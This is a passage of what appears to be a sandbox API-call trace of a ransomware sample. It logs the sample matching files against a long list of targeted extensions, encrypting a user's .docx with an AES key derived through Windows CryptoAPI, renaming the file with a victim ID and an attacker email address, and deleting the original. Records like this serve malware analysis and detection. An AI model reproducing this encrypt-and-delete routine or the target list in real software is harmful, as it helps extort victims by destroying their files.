	[0185.372] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".docx") returned=".docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0185.372] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0185.373] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0185.373] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\ddbbjy.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\ddbbjy.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0185.377] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x6524, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x6524, lpOverlapped=0x0) returned 1
	[0185.379] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.380] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcb5d8) returned 1
	[0185.382] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.382] CryptCreateHash (in: hProv=0xfcb5d8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0185.382] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.383] CryptHashData (hHash=0xfb9bf0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0185.383] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.383] CryptDeriveKey (in: hProv=0xfcb5d8, Algid=0x6610, hBaseData=0xfb9bf0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9830) returned 1
	[0185.383] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.383] CryptEncrypt (in: hKey=0xfb9830, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x6524, dwBufLen=0x6524 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x6530) returned 1
	[0185.384] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0185.385] RtlMoveMemory (in: Destination=0xfe36b0, Source=0xfdd180, Length=0x6524 | out: Destination=0xfe36b0) 
	[0185.385] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.385] CryptEncrypt (in: hKey=0xfb9830, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe36b0*, pdwDataLen=0x18bc0c*=0x6524, dwBufLen=0x6530 | out: pbData=0xfe36b0*, pdwDataLen=0x18bc0c*=0x6530) returned 1
	[0185.389] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.389] CryptDestroyKey (hKey=0xfb9830) returned 1
	[0185.389] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.389] CryptDestroyHash (hHash=0xfb9bf0) returned 1
	[0185.389] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.389] CryptReleaseContext (hProv=0xfcb5d8, dwFlags=0x0) returned 1
	[0185.389] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0185.390] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0185.390] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.390] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0185.392] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\ddbbjy.docx.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 85
	[0185.392] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\ddbbjy.docx.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\ddbbjy.docx.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0185.392] WriteFile (in: hFile=0x2c0, lpBuffer=0xfe36b0*, nNumberOfBytesToWrite=0x6530, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfe36b0*, lpNumberOfBytesWritten=0x18c068*=0x6530, lpOverlapped=0x0) returned 1
	[0185.397] CloseHandle (hObject=0x2c0) returned 1
	[0185.397] CloseHandle (hObject=0x384) returned 1
	[0185.397] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\ddbbjy.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\ddbbjy.docx")) returned 1
	[0185.407] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\ddbbjy.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\ddbbjy.docx")) returned 0
	[0185.407] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x43649a85, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43649a85, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4372e947, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0185.407] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1
	[0185.407] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1
	[0185.408] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\"
	[0185.408] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\desktop.ini") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\desktop.ini"
	[0185.408] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\desktop.ini") returned 43
	[0185.408] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0185.408] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\desktop.ini", cchLength=0x2b | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\desktop.ini") returned 0x2b
	[0185.408] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0185.408] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\desktop.ini", lpSrch="help_decrypt_your_files") returned 0x0
	[0185.409] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\desktop.ini" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\desktop.ini") returned="c:\\users\\rdhj0cnfevzx\\documents\\desktop.ini"
	[0185.409] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\desktop.ini") returned 43
	[0185.409] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0185.409] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0185.409] StrStrW (lpFirst=".ini", lpSrch=".") returned=".ini"
	[0185.409] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0185.410] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.